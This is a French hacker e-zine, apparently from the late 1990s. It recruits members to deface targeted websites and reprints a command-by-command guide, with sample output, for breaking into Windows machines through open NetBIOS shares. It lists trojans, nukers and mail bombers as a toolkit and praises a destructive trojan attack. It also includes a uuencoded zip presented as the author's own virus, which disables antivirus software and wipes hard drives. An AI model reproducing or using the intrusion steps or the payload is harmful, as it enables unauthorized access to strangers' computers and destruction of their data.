()-----------------------------------------------------------------() () -THE- () () -UNDERGROUND- () () -ANGELS- () () http://www.respublica.fr/underground-angels/ () ()-----------------------------------------------------------------() | E-Zine N°1 | |______Par White Angel______| ===================================================================== Edito ===================================================================== Bienvenue dans le premier numéro de TUA l'Ezine. TUA est un groupe de hackers qui ne désire qu'une chose, remettre de l'ordre dans le réseau. Nous nous ne prenons pas pour des Zorros mais nous hackons des sites bien définis afin qu'ils cessent de nuire. Dans ce zine, nous vous exposerons quelques techniques de Hacking, de Social Engenerring et d'autres petites choses interressantes... Nous ne verrons pas de cracking ni de carding car cela ne nous servira à rien (pour l'instant...) Ici, tout fonctionne de la façon suivante: -Vous vous inscrivez au groupe -Vous choisissez une cible dans la "liste" -Vous vous en référez à moi et je vous donne mon accord -Vous hackez ce site en expliquant pourquoi vous l'avez hacké et en faisant un peu de pub pour le groupe. -Ensuite, si c'est un site qui a enfreint la loi comme un site pédophile, vous balancerez les webmasters aux gendarmes. Vous éprouverez ansi une certaine auto-satisfaction. Voilà... Je vous souhaite une bonne lecture. White_Angel_TUA@Hotmail.com ===================================================================== ON RECHERCHE POUR NOTRE GROUPE ===================================================================== -Des hackers, plein de hackers sous Windows / Linux ou autre... Vous serez les piliers du groupe. Débutants ou expert, si vous aimez ça, rejoignez-nous. -Des graphistes pour le site. Mes dessins sont un peu miteux les gars... -Des programmeurs pour créer des logiciels qui nous faciliterons la tâche. C'est fatiguant de hacker "à la main" -Un hébergement gratos pour notre site avec accès ftp et http. Ce serai sympa.... -Des "Chasseurs" pour trouver les sites sensibles Alors, pour ceux qui n'ont pas peur, vous devrez vous ballader sur le web pour relever des adresses (pédophile, racistes, ...etc voir la liste.) que nous mettrons dans une Black list. -Des taupes dans des entreprises pour des infos interressantes. Pour être au courant avant tout le monde et taper là ou ça fait mal. -Des traducteurs (Anglais/Russe/Allemand/Japonais/Chinois/Italien....) Pour que nous puissions être compris du mond entier. -Des contacts dans la presse pour exprimer nos idées. Car la presse et notre "amie" et sera notre voie. -Des écrivains pour écrire des articles pour le Zine (Tutorials, histoires, chansons, pensées philosophiques...) On a besoin de vos talents... -Des pros de la sécurité pour nous aider à pas nous faire pincer. Des gars qui pourront foutre des Firewalls partout sur le site et qui pourront nous expliquer comment détourner tel ou tel système. -Des codeurs et programmeurs de Démos pour nous faire un super spot de pub... Là, on est gentils... Merci et surtout, n'hésitez pas à vous inscrire.... ===================================================================== Ma clé publique si vous voulez m'écrire. ===================================================================== -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP for Personal Privacy 5.0 mQGiBDED2mcRBADei6izty5bfB4qDyckHKHavdClYfElRSxpnk0XLYmOBIGzYlR3 qjynlj/aGH77/5pvX+nQksbKUjWN8DrBsuNwFLJyNvcanmFCH8ntCvBPf3nbpwvO EzEvl7+tBQ1WgdZO4N3eaMVk8KMGqbnah56Ts8ZmGjBfTvKhFTbi2rXvbwCg/1Vw SiIAy8+xV79sPoZyhXXA6RkEAM8RNvjKa2GC/kLuA49j9ya+wDeKIN+2cjzZBncH Q771iabAgekPPGKnAkT6MfYRemK6Sujn3Zju+C1cGEvWTqVKNB4bTgkUkp2t/Ith dgkelMBIWU8kEnGaNJBWDWhMFEAX8huf8GQxS5/2thM3NIeW9jXCI5oD8zf21Xp9 nfwDA/4jCWljEhj9UtJSvRlRLhri5Fx7pA3ggVxvP1itk9NV6RTA1WRza3gUrWqP DdT/zqEHyXZr1hOxAVLSav5mZ0YnAy1HUgtCswRfdiNJ2LMCO3ugSKF/Wn9YfTL9 o3DMcsXXdWGNftfeeVxpQBWxoRjOV6v/W9G2HMtuYFImS/IxgLQpV2hpdGUgQW5n ZWwgPHdoaXRlX2FuZ2VsX3R1YUBob3RtYWlsLmNvbT6JAEsEEBECAAsFAjED2mcE CwMBAgAKCRD0Bss5ZC7lVIYSAKCHjbHMXTvJRzQApCD3EFhjMxBvEgCfd3E33q5A m0WrbRDfo6Y7TuQjj9O5Ag0EMQPaaBAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+2 8W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZS Tz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI6 1Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/Cl WxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgH KXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIH/0Q/ k0NL1Ug5suw32tHLIfOk2TTNkMsahKZoNe2nIAGnsIZbaITKVzaDO4MkM061DI5U LRgdV/TeYbeHfdAMN+vf36bup5GWSPfotyEJP9DBfcPG05DawBKe5w7XMlPv6EhE p2SO72ghM+6JgizdrSWZ6M0U3QF7cwSVCJdo55Jqaany+ClLivQVetdDDDtBSLQc oH/sGpLp1MjpQceW7yRPIuCMaZ3abi0mgYt1p5KLNgqv0PRbrbwewd2+ZRDSoqvr b96GYHY6Yn9nbkEEwz5ZfPXCvQpBlE5PRQspwUHtYrsApp5oj0Ay4IpVto3m2t8D SmkoyyGxQL5WICA6b/OJAD8DBRgxA9po9AbLOWQu5VQRAgz8AKDcMlkNy02F9PVe IuX4Tlo8YXjExQCdEgXJlsOVhRFHSBEagduwZ37sX6U= =z1yR -----END PGP PUBLIC KEY BLOCK----- ===================================================================== Sommaire ===================================================================== *Disclaimer *Comment Hacker un NT *La Liste *Un Héro Israëlien *La Boite à outils du Hacker *Un petit virus *Quelques bonnes adresses *Inscription *Remerciement ===================================================================== DISCLAIMER ===================================================================== Cette partie est selon moi inutile mais bon... "Ce fichier et tout les autres écrit par White Angel ou un des membres de The Underground Angels ne doit pas inciter ses lecteurs à faire des actes illégaux. Ici, tout ce qui est écrit est pour votre information. En aucun cas les membres de The Underground Angels ne sont responsables des actes des lecteurs." Voilà. ===================================================================== Comment Hacker Un NT ===================================================================== Repiqué à feu FrHAck parce que grosse flemme, alors merci frHack.... Cette technique fonctionne aussi bien pour Windows 3.11/95/98/NT. Elle vous permet de rentrer dans les fichiers d'un ordinateur distant en toute impunité. Voici comment procéder: Tout d'abord, vous devez avoir installé le protocole TCP/IP et tout ce qui est necessaire pour une connexion en réseau. Vous devez donc avoir l'icone Voisinage réseau sur votre bureau. D'abord, vous devez avoir l'ip de votre victime (/dns sous IRC ou Infos sous ICQ...) Si c'est un serveur, tapez: ping -n 1 -w 3000 www.victime.com Ensuite, ouvrez une session dos puis tapez: C:\WINDOWS>nbtstat -A son_ip Vous obtiendrez ainsi un truc du genre: --------------------------------------------------------------------- NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- USERNAME <00> UNIQUE Registered VICTIME <00> GROUP Registered USERNAME <03> UNIQUE Registered USERNAME <20> UNIQUE Registered VICTIME <1E> GROUP Registered MAC Address = 46-55-53-45-00-00 C:\WINDOWS> Si la personne fait tourner le client microsoft avec le partage de fichiers/imprimantes active, c'est ce que vous devriez voir. Sinon, un message d'erreur peut apparaitre: "Host not found.", il y a deux causes principales a cette erreur. 1- la personne ne fait pas tourner le client microsoft ou n'est, tout simplement pas sous windows, donc c'est normal. 2- quelqu'un sur le reseau utilise le meme nom de machine que vous, changer le votre en un autre moins probable (Panneau de Configuration / Reseaux / Identification). Bon, imaginons que vous ayez du premier coup une reponse favorable de nbtstat, ce qui nous interresse c'est le Remote <20>, c'est le service de partage de fichiers, s'il n'y est pas, n'esperez pas pouvoir vous connecter sur la machine. Pour la petite information, le MAC Address (Media Access Control), c'est un chip sur les cartes ethernet qui delivre un numero d'identification unique pour la carte (qui est egalement simule par le dial-up de windows, c'est pour ca que la plupart des MAC address que vous verrez seront les memes ;)). Bon, maintenant que vous connaissez le nom du remote 20, il faut que vous l'ajoutiez au fichier lmhosts dans le repertoire de windows, si ce nom contient des espace mettez-le simplement entre guillemets (""). Ce fichier est utilise par la pile du client Wins (qui fait que le NetBios prime sur le TCP/IP) et contient la redirection des addresses ip vers des nom d'ordinateurs. Ce fichier est divise en plusieurs colones, la premiere contient l'addresse ip, la seconde le nom de la machine hote et la troisieme et les suivantes des directives et/ou des commentaires. Ce qui differencie le passage d'une colone a une autre c'est au mimimum un espacement. Chaque directives et chaque commentaires doit etre precede du signe #, mais ils ne nous servent a rien pour le moment. ;--- Suite de la Session DOS --- C:\WINDOWS>echo addresse_ip nom_du_remote_20>>c:\windows\lmhosts C:\WINDOWS>_ ;------ Ici, si vous n'aviez pas de fichier lmhosts existant, remplacez la redirection par un simple ">" au lieu de ">>". Bon une fois le nouveau host ajouter, il ne vous reste plus qu'a resetter le cache du netbios ;--- Suite de la Session DOS --- C:\WINDOWS>nbtstat -R Successful purge and preload of the NBT Remote Cache Name Table. C:\WINDOWS>_ ;------ Maintenant, il faut savoir quelles sont les ressources partagees sur la machine hote, pour cela, on va se servir de la commande "net", dont le parametre view permet (justement) de lister ces ressources. ;--- Suite de la Session DOS --- C:\WINDOWS>net view \\nom_du_remote_20 Shared resources at \\USERNAME Sharename Type Comment ------------------------------------------- A Disk C Disk D Disk HPDeskJet Printer The command was completed successfully. C:\WINDOWS>_ ;------ Ok, si tout c'est bien passe, vous devriez avoir quelque chose de similaire. Sinon voila toujours une petites liste des messages d'erreur les plus courant, et comment en venir a bout. Error 5: You do not currently have access to this file. La machine partage des ressources mais vous devez entrer un password pour avoir access. Pour cela il faut passer par windows (si qlq1 connait un autre moyen, merci :)), cliquez sur demarer / rechercher / ordinateur (si vous n'avez pas cette option allez downloader les powertoys sur le site de microsoft). La remplissez le nom de l'ordinateur par \\nom_du_remote_20 et cliquez rechercher. Une fois que la machine est trouvee, cliquez deux fois dessus, vous pourrez alors entrer un password reseau (les premiers a essayer sont le nom du remote 20, ou un password vide). Error 53: The computer name specified in the network path cannot be located. Ici il peut y avoir deux causes, soit vous avez mal introduit des donnees precedement (dans lmhosts par exemple, ou encore dans la commande "net view"), soit la machine que vous essayez d'atteindre n'est pas accesible (elle vient de se faire deconnecter). Error 59: An unexpected network error has occurred. (Disconnected) Ici, l'erreur et due a un probleme lors de la transmission des donnees entre vous et la machine PENDANT l'execution de la commande "net view". Error 86: The specified network password is not correct. Le password que vous venez d'entrer (via le dos), n'est pas valide. Error 3787: You must log on before performing this operation. (Find) Cette erreur reste un demi mystere, elle est due au fait que windows 95 pense, lors de votre premiere tentative d'utiliser "net view" que vous n'est pas loguer sur le reseaux. Pour ne plus avoir ce probleme durant la meme session internet, cliquez sur démarrer / rechercher / ordinateur (si vous n'avez pas cette option allez downloader les powertoys sur le site de microsoft). La remplissez le nom de l'ordinateur par \\nom_du_remote_20 et cliquez rechercher. Une fois que la machine est trouvee, cliquez deux fois dessus, vous pourrez alors relance la commande "net view" sans messages d'erreurs. ===================================================================== La Liste ===================================================================== -Sites pédophiles (Sites à dénoncer aux autorités) -Sites Racistes (A Détruire) -Sites Nazis (SS, FN....) (A Détruire) -Sites de pays ou les droits de l'homme ne sont pas respectés. (A Détruire) -Sites pronant l'exclavagisme (Hommes, Femmes, Enfants...) (A Détruire) -Sites de sociérés utilisant des animaux pour des expériences ou pour des fourrures. (A Détruire et à dénoncer aux autorités) -Des grosses entreprises dangereuses (Microsoft, France Télécom) (Ne pas détruire mais plutôt s'en servir comme passerelle pour d'autres choses plus interessantes...) -Sites de sectes (Eglise de la Scientologie...) (A Détruire et à dénoncer aux autorités si il y a une chance qu'elle soit inculpable) -Sites sataniques... (A Détruire) -Autres sites empécheur de tourner en rond.... (On verra...) ===================================================================== Un Héro Israélien (Une News que j'ai reçu...) ===================================================================== 14 ans !!! Comme quoi on peut être très jeune et avoir de bonnes idées. Nir Zigdon est un jeune Israélien qui vit dans la banlieue de Jérusalem. Un jour il découvre que le site Irakien "Iraq.com" diffuse des infos mensongères sur la Palestine et sur les USA ansi que de la propagande anti-sémite. Il décide donc de se venger. Il contacte le webmaster d'Iraq.com, Fawzi El-Faramawy, un étudiant égyptien de 26 ans habitant à New York. Nir donne donc un faux nom et se fait passer pour un palestinien fan de Saddam Hussein. Il propose à El-Faramawy de détruire tout les sites Israeliens en lui envoyant un logiciel conçu à cet usage. Il s'agit en fait d'un virus que Nir avait programmé. Le webmaster le récéptionne et l'éxecute. Le cheval de troie est alors actif. Il détruit toutes les données du HD et donc par conséquent tout le site Iraq.com. Fawzi El-Faramawy se mange un savon du tonnerre et Nir Zigdon devient un héro national en Israël. Il paraitrait même qu'il aurait forcé quelques sites militaires "Secret Défense". Quelque chose me dit qu'on va encore entendre parler de lui... ``'''''!!!!!~=%*%%j%%&&&: ````;8UA4AAU3 'S' '' `%*= ` ``` '$UU#A4A4S:''#@ @NNNNNNNNNHHUj!~~~~''''''! ```''8#Uj`'! %%!'@H@ ` NNNNNNHNHNHH@H#3==;;=;:j ``:=''`!8~'jHNNHHRR@HHHHHHNHNNNMNNNNNNHHHR$$3$SSU !&'!HHMNMHHHH@H@NRHNHHNHNHHHNHHHNNNNNNMN43$S$SU !HNMHNMMMHHNNNHHNN#AHHNNHNH833jj;::!;=SHMNHS$$$$U RNHHHNNNNNNMNMNNNNNMMNNH43=!!!~~~~~!!::=:*SNN=*;;j !@HHHHNH@HNMNNMN@###SU&;:!:!'``'~~~~~!!:!;;=j4=;=j !HNNNNNMNHNNMNNA@HH@#%&:!!!!''''~'!!~!!~~~:;;=$j*j '3NNMHNNMNNNMNHNNNN#3=::::!!~~!~!!!'!!~!~!!!:;%$%$ `!MNMNMMNMMNNHH@HRAj3&*;;=::!!!~!~~'~'~'~'~!::;3j3 '~$NMMMMMNNMNMHNHRRS;;;:::::!~''''~'``'''''~~:8H$% ''~NNNNMMMNHHNH@HH8&=;;;=~'!~'!~'~~!!~~~~!:;%HA&'' ''~SNMNNNHNHNNU@4j&*=:::*$S4S@A@###UUj;'''!SNj@R`' ''%4S=:=NHN@HHA3=;:;::*$%=;*4H@HHNH4$j=~ %$3$!`` '`3Sj*$S**j@R#4$;::!:;&;j4SHNNH 'j:!!!!:' !:!'` `''&;j8UUUj%U4$;:!!!!!::::;;=&~!!::!``''''``'::: ''''&;&;;3!:=*;:&;:::!!!!!~!!~!!:'''~''``'` ~''' '~~!::**~:$:*&=====;!~!!~~~'` ````'~~!!~~'` `~!! !!!:!:::;::~:&&%&&*=:::!:!~~'`' '~!:!!'`'!'!~''!;! !!!:::===S84R8%%*==:;;=;::!!!:!:::!!~~%8848U$;=;N@ !!!:;=;&=%8S3$S&&%&;=====;:==;:::=::!!'::;*;%*3@NH !!::;;&&%3$U8jS8&%*===;=&==&;;*&&*;:!!'!$$8S$&NNNN !::;***%%j$$44SSUS$%&&&j=&%&====;&;;;=*&:;%%%@NMHN :::;:&%%%SN4344S4URA4$$j3$%&j&&*==;&%$#HHHU3jMNNNH ;:::=&&3HMNH4S$S44R@@@NHRA4S333%*=&;=!:!!==*@NNHN# ::;;&&%NNHNMHNS$$SR48@HNHNNNNHHAS%%=:::==%UNMNMNN4 ::;;&%NNMMNNMMMMNNNNNH#4#NMMNNNHH#@@#4NHNMMMNNNNNS =*&*$NMNNNNNNNNMNNNNNNNNNNNNNNNH@##@#S#NNNNNNMMMH3 *=%jNNNNNNNNNHNNNNNNNNHNNNMNNNNNMNN#@U3NNNNNHNNNH~ %&3NNNMNNNNNHNNNNNNNNNHNNNNNNNNNNNNHNNNNNNHHNNMMj` jjHNNHMHHNNHNNNNHNHNNNNNHNNNNHNNNNNNNNNHNHHNNHH:: j$NHHN@NNHHNNNHNHNHHNNNNNHNNHNNHNNHNHNNNNNNNNNNS` 3HNHHNNNHHNNHNHNHHHNHHHHHNHNHNNNHHHNNNNNHHNNNNNN! $NNNNHN@HHHNHNHHNNHNHHNNNNNNHMNNHNNNNHNNNHNNNNHM@ Nir Zigdon posant pour les Journalistes (Prenez un peu de recul pour bien voir la photo) ===================================================================== La boite à outils du Hacker ===================================================================== Voici une liste assez complète pour faire face à toutes les situations. Tout d'abord, il vous faut un E-mail que vous utiliserez pour vos affaires illégales (Pas de vrai nom ni d'adresse, juste un pseudo...) (Hotmail est un très bon exemple). -Un N° ICQ -Un crackeur de password -Plusieur Nukers -Des patchs, un firewall et des outils de surveillance pour ne pas vous faire hacker. -Une Ip non fixe (qui change à chaque connexion) -Un carnet et un stylo pour noter les infos utiles -Un client FTP -Un masqueur d'ip ou un anonymiseur. (ex: www.anonymizer.com) -Un bon modem -Un accès Internet hors de chez vous (Etablissement scolaire, Cybercafé...etc) -Un logiciel de mail bombing -Quelques bon virus -Des Trojans (Netbus, BO...) -Un client IRC (Mirc...etc) -...etc ===================================================================== Un petit virus ===================================================================== Ce virus que j'ai crée se prénomme TUA.com. Il désactive les anti-virus et détruit le HD.(Théoriquement car je l'ai pas essayé) (EN FORMAT UUE) _=_ _=_ Part 001 of 001 of file TUA.zip _=_ begin 666 TUA.zip M4$L#!!0``@`(`#=\,R0#)J?%)P,``,(#```'````5%5!+D-/385236C38!A^ MOWQ)JT@C6E04;1JV!5'Z*2OSL+%J-T9%Y^Q^='_,.CR(B`C:X&6'%$6IEZ<'@3?X@S35U75Q2L?"AZ$8>BPT-F\;0A.&OCE_F')P,)>;[GS?.^S_/& M!M#+V_10ZC-&1(M$42;9D)GB+^:BR$*@A6Y_6>4(7U95!$=("9T)33@5BY6$ M$:.5RL8R*L^\72S>R[ZM0[&9KV:Q2&7-*283]E+.;N'L#YS-8U.NHW)D^-H` MCEPXF\!BS\YT7M$#&$3OZ5+C2*KTBC=V43F[7#!V4MDEGW@0+-F1SE\:^5=R>W:N45R8U: M>66RJK%85+D'1>*0`5SH;U-WMPP$VT@':24Q$HSV=41;6F>/<:,']W?O\P1$ MR:QF@U[P#.+AP"%L5M=8;9C*DG<@<6#PZJ\B$YJI3(;%?FRBYO!3*IM<(Y7U MUR9T+YYW8S*\NA>3*G&2)PWLH>+9*V!R3?8;$*40!G*C'9O09#]CT-B>P6!U ML28D%>G">_I47#HZXK*W7'9'!H'5R5CVQH'5CMUN3?8EQHG>1F;EO6*_+%\D%ED?#_K._C;?G5-=A"GI[.'_B8S>[T2?AI^2>5";?XYP"P- MPK^7L8D9K+\\P2>7$"TWP0?5S:1^//<3YGB?NM[P4?D.EW$<"X`J?Y'C4*5@ M:M?3>1-Q;AH:A*>IGVW*/-I$N/8SJ[F+LDS'7U@(Y],O M'L*0/A_WQJ5OH_'VCH#'X.DZ4K^-M5_JE?IZ>ZZ6JD;"+UG`Y@I\3\M"/%V@ M_I-\[4?JKSS1*OR)CY7'I7=,*9^%(8.[@^ZB^S".[FG4_PF&F+L0^^47//\S M@1:LEEZ6T:AH'_]^)J]&XYT>HYW*Z8+2$%@-*M'?G/?&C2U4[JGD57RZX%7T MV)H:"4BMYQ&O+E>TPVO>*ZGC&Z:PLC8F>?M[G@=]`0C\`%!+`0(4`!0``@`( M`#=\,R0#)J?%)P,``,(#```'````````````(`#_@0````!454$N0T]-4$L% 3!@`````!``$`-0```$P#```````` ` end ===================================================================== Quelques bonnes adresses ===================================================================== Une petite liste de sites FTP (Je les ai pas tous fait :-)) 204.215.84.2 /pub/dmackey 2600.com (2600 Magazine) aeneas.mit.edu (Kerberos) alex.sp.cs.cmu.edu /links/security (Misc) asylum.sf.ca.us (CyberWarriors of Xanadu) athena-dist.mit.edu /pub/ATHENA (Athena Project) atlantis.utmb.edu (Anti-virus) bellcore.com (Bellcore) cert.org (CERT) ciac.llnl.gov (CIAC) clark.net /pub/jcase (H/P) cnit.nsk.su /pub/security (Security) coast.cs.purdue.edu /pub (Security/COAST) coombs.anu.edu.au /pub/security (Security) csrc.ncsl.nist.gov (NIST Security) dartmouth.edu /pub/security (Security) ds.internic.net (Internet documents) dutiws.twi.tudelft.nl /pub/novell etext.archive.umich.edu /pub/Zines/PrivateLine (PrivateLine) fastlane.net /pub/nomad ftp.3com.com /pub/Orange-Book (Orange Book) ftp.acns.nwu.edu /pub (Mac Anti-virus) ftp.acsu.buffalo.edu /pub/security & /pub/irc (Security & IRC) ftp.alantec.com /pub/tcpr (Tcpr) ftp.armory.com /pub/user/kmartind (H/P) ftp.armory.com /pub/user/swallow (H/P) ftp.auscert.org.au /pub (Australian CERT) ftp.cerf.net /pub/software/unix/security (CERFnet) ftp.cert.dfn.de (FIRST) ftp.cisco.com (Cisco) ftp.commerce.net /pub/standards/drafts/shttp.txt(Secure HyperText) ftp.cs.colorado.edu ftp.cs.ruu.nl /pub/SECURITY (Security & PGP) ftp.cs.uwm.edu /pub/comp-privacy (Privacy Digest) ftp.cs.vu.nl ftp.cs.yale.edu ftp.csi.forth.gr /pub/security ftp.csl.sri.com /pub/nides (SRI) ftp.csn.org /mpj (Cryptology) ftp.csua.berkeley.edu /pub/cypherpunks (Crypto) ftp.delmarva.com ftp.demon.co.uk /pub/misc/0800num.txt (0800/0500 numbers) ftp.digex.net /pub/access/dunk ftp.dsi.unimi.it /pub/security/crypt (Crypto) ftp.ee.lbl.gov ftp.eff.org /pub/Publications/CuD (EFF) ftp.elelab.nsc.co.jp /pub/security (Security) ftp.etext.org (Etext) ftp.fc.net /pub/deadkat (TNO) ftp.fc.net /pub/defcon (DefCon) ftp.fc.net /pub/defcon/BBEEP (BlueBeep) ftp.fc.net /pub/phrack (Phrack) ftp.foobar.com ftp.funet.fi /pub/doc/CuD ftp.gate.net /pub/users/laura ftp.gate.net /pub/users/wakko ftp.giga.or.at /pub/hacker/ (H/P) ftp.greatcircle.com /pub/firewalls (Firewalls) ftp.IEunet.ie /pub/security (Security) ftp.ifi.uio.no ftp.indirect.com /www/evildawg/public_access/C&N/ ftp.info.fundp.ac.be ftp.informatik.uni-hamburg.de ftp.informatik.uni-kiel.de /pub/sources/security ftp.inoc.dl.nec.com /pub/security (Security) ftp.isi.edu ftp.lava.net /users/oracle/ (H/P) ftp.leo.org/pub/com/os/os2/crypt ftp.lerc.nasa.gov /security ftp.llnl.gov /pub (CIAC) ftp.luth.se /pub/unix/security ftp.lysator.liu.se ftp.mcs.anl.gov /pub/security ftp.microserve.net /ppp-pop/strata/mac (Mac) ftp.near.net /security/archives/phrack (Zines) ftp.nec.com ftp.netcom.com /pub/br/bradleym (Virii) ftp.netcom.com /pub/da/daemon9 (H/P) ftp.netcom.com /pub/fi/filbert ftp.netcom.com /pub/gr/grady ftp.netcom.com /pub/il/illusion (H/P+Virus) ftp.netcom.com /pub/je/jericho (H/P) ftp.netcom.com /pub/le/lewiz (Social Engineering) ftp.netcom.com /pub/ty/tym (TYM) ftp.netcom.com /pub/va/vandal (DnA) ftp.netcom.com /pub/wt/wtech/ ftp.netcom.com /pub/zi/zigweed (H/P) ftp.netcom.com /pub/zz/zzyzx (H/P) ftp.netsys.com ftp.ocs.mq.edu.au /PC/Crypt (Cryptology) ftp.ox.ac.uk /pub/comp/security ftp.ox.ac.uk /pub/crypto (Cryptology) ftp.ox.ac.uk /pub/wordlists (Wordlists) ftp.paranoia.com /pub/toneloc/tl110.zip (ToneLoc) ftp.pipex.net /pub/areacode (uk areacodes) ftp.pop.psu.edu ftp.primenet.com /users/i/insphrk ftp.primenet.com /users/k/kludge (H/P) ftp.primenet.com /users/s/scuzzy (Copy Potection) ftp.primus.com /pub/security (Security) ftp.psy.uq.oz.au ftp.psy.uq.oz.au /pub/DES ftp.rahul.net /pub/conquest/DeadelviS/script/vms/ ftp.rahul.net /pub/lps (Home of the FAQ) ftp.sert.edu.au ftp.sgi.com ftp.smartlink.net /pub/users/mikes/haq ftp.std.com /archives/alt.locksmithing (Locksmithing) ftp.std.com /obi/Mischief/ (MIT Guide to Locks) ftp.std.com /obi/Phracks (Zines) ftp.sunet.se /pub/network/monitoring (Ethernet sniffers) ftp.sura.net /pub/security (SURAnet) ftp.technet.sg ftp.technion.ac.il ftp.tis.com /pub (TIS) ftp.tisl.ukans.edu /pub/security ftp.uni-koeln.de (Wordlists) ftp.uspto.gov ftp.uu.net /doc/literary/obi/Phracks (Zines) ftp.uwp.edu /pub/dos/romulus/cracks (Copy Protection) ftp.vis.colostate.edu ftp.vix.com ftp.vortex.com ftp.warwick.ac.uk /pub/cud (Zines) ftp.wi.leidenuniv.nl /pub/security ftp.win.tue.nl /pub/security (Security) ftp.winternet.com /users/nitehwk (H/P) ftp.wustl.edu /doc/EFF (EFF) ftp.zoom.com ftp.zrz.tu-berlin.de/pub/security/virus/texts/crypto (Cryptology) garbo.uwasa.fi /pc/crypt (Cryptology) gemini.tuc.noao.edu /pub/grandi gti.net /pub/safetynet gumby.dsd.trw.com hack-this.pc.cc.cmu.edu (Down for Summer) heffer.lab.csuchico.edu (Third Stone From The Sun) hplyot.obspm.fr info.mcs.anl.gov infonexus.com /pub (The Guild) jerico.usc.edu l0pht.com (The L0pht) lcs.mit.edu /telecom-arc (Telecom archives) lod.com (Legion of Doom) mac.archive.umich.edu mary.iia.org /pub/users/patriot (Misc) monet.ccs.itd.umich.edu net-dist.mit.edu /pub/pgp net.tamu.edu /pub/security/TAMU (Security) net23.com /pub (Max Headroom) nic.ddn.mil /scc (DDN Security) nic.sura.net /pub/security oak.oakland.edu /pub/hamradio (Ham Radio) oak.oakland.edu /SimTel/msdos/sound (DTMF decoders) oak.oakland.edu /SimTel/msdos/sys (BIOS attackers) parcftp.xerox.com pyrite.rutgers.edu /pub/security (Security) relay.cs.toronto.edu /doc/telecom-archives (Telecom) rena.dit.co.jp /pub/security (Security) research.att.com /dist/internet_security (AT&T) ripem.msu.edu /pub/crypt (Ripem) rmii.com /pub2/KRaD (KRaD Magazine) rtfm.mit.edu (Etext) rtfm.mit.edu /pub/usenet-by-group (Usenet FAQ's) scss3.cl.msu.edu /pub/crypt (Cryptology) sgigate.sgi.com /Security (SGI Security) sierra.stanford.edu spy.org (CSC) src.doc.ic.ac.uk /usenet/uk.telecom (uk.telecom archives) suburbia.apana.org.au /pub/unix/security (Security) sunsolve1.sun.com theta.iis.u-tokyo.ac.jp /pub1/security (Security) titania.mathematik.uni-ulm.de /pub/security (Security) toxicwaste.mit.edu /pub/rsa129/README (Breaking RSA) ugle.unit.no unipc20.unimed.sintef.no vic.cc.purdue.edu vixen.cso.uiuc.edu /security web.mit.edu whacked.l0pht.com (Mac + H/P) wimsey.bc.ca /pub/crypto (Cryptology) wuarchive.wustl.edu /pub/aminet/util/crypt --------------------------------------------------------------------- Quelques sites www 134.220.198.66:8000 (Peter Strangman's) alcuin.plymouth.edu/~jay/underground.html (Underground Links) all.net (American Society for Industrial Security Management) alumni.caltech.edu/~dank/isdn/ (ISDN) asearch.mccmedia.com/www-security.html (WWW-security info) aset.rsoc.rockwell.com (NASA/MOD AIS Security) aset.rsoc.rockwell.com/exhibit.html (Tech. for Info Sec) att.net/dir800 (800 directory) ausg.dartmouth.edu/security.html (UNIX Security Topics) bianca.com/bump/ua (Unauthorized Access Home Page) ccnga.uwaterloo.ca/~jscouria/gsm.html (GSM Specification) cell-relay.indiana.edu/cell-relay (Cell Relay Retreat) ciac.llnl.gov (CIAC Web Site) community.net/community/all/home/solano/sbaldwin cs.purdue.edu/homes/spaf/coast.html (The COAST Project and Laboratory) csbh.mhv.net/dcypher/home.html (Dcypher's Home Page) csrc.ncsl.nist.gov (NIST) cwix.com/cwplc (Cable and Wireless) daemon.apana.org.au/~longi/ dcpu1.cs.york.ac.uk:6666/fisher/telecom (Embryonic Telephone History Page) dfw.net/~aleph1 (The Uebercracker's Security Web) draco.centerline.com:8080/~franl/crypto.html (Crypto) draco.centerline.com:8080/~franl/privacy/bacard-review.html enigma.pc.cc.cmu.edu/~caffeine/home.html (Caffeine's Home Page) everest.cs.ucdavis.edu/Security.html (UCDavis.edu Security Page) everest.cs.ucdavis.edu/slides/slides.html (Security Lab Slides) ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html (CSSCR) fastlane.net/homepages/thegnome (Simple Nomad) first.org (FIRST) freeside.com/phrack.html (Phrack Magazine) frosted.mhv.net/keytrap.html ftp.arpa.mil (ARPA home page) ftp.tamu.edu/~abr8030/security.html (Security) grove.ufl.edu/~bytor (Bytor home page) hightop.nrl.navy.mil/potpourri.html (MOD Security) hightop.nrl.navy.mil/rainbow.html (MOD Rainbow Books) ice-www.larc.nasa.gov/ICE/papers/hacker-crackdown.html (Sterling) ice-www.larc.nasa.gov/ICE/papers/nis-requirements.html (ICE NIS) info.bellcore.com/BETSI/betsi.html (Betsi) info.gte.com (GTE Labrotories) info.mcc.ac.uk/Orange (Orange) infosec.nosc.mil/infosec.html (SPAWAR INFOSEC) infosec.nosc.mil/navcirt.html (NAVCIRT) iss.net/iss (Internet Security Systems) jumper.mcc.ac.uk/~afs/telecom (UK Telecom Pricing Information) l0pht.com (The l0pht) l0pht.com/~oblivion/IIRG.html (Phantasy Magazine) l0pht.com/~spacerog/index.html (Whacked Mac Archives) lcs.mit.edu/telecom-archives/areacodes/guide (North American Area Codes) lcs.mit.edu/telecom-archives/npa.800 (1-800 Info) lcs.mit.edu/telecom-archives/npa.900 (1-900 Info) lod.com (Legion of Doom) lod.com/~gatsby (Gatsby) lod.com/~tabas (Mark Tabas -- LOD) lod.com/~vampire/emptime7 (Empire Times) magicnet.net/xtabi/netscape/links/cypher.html (Cryptology) mars.superlink.net/user/esquire (Red box info) matrix.resnet.upenn.edu/rourke (FakeMail FAQ) mindlink.jolt.com (The Secrets of LockPicking) mindlink.net/A7657 (Stephen H Kawamoto's Home Page) mls.saic.com (SAIC MLS) mnementh.cs.adfa.oz.au/Lawrie_Brown.html (Lawrie Brown's crypto bibliography) motserv.indirect.com (Motorola) naic.nasa.gov/fbi (FBI information) nasirc.nasa.gov/NASIRC_home.html (NASIRC) 